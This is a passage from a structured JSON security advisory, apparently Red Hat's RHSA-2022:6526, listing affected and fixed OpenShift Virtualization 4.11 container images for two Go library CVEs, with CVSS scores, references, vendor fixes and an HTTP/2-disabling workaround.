"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-38561", }, { category: "external", summary: "RHBZ#2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-38561", url: "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2021-0113", url: "https://pkg.go.dev/vuln/GO-2021-0113", }, ], release_date: "2021-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", }, { cve: "CVE-2021-44716", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030801", }, ], notes: [ { category: "description", text: "There's an uncontrolled resource consumption flaw in golang's net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http's http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http: limit growth of header canonicalization cache", title: "Vulnerability summary", }, { category: "other", text: "For OpenShift Container Platform, OpenShift Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44716", }, { category: "external", summary: "RHBZ#2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44716", url: "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, { category: "workaround", details: "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", 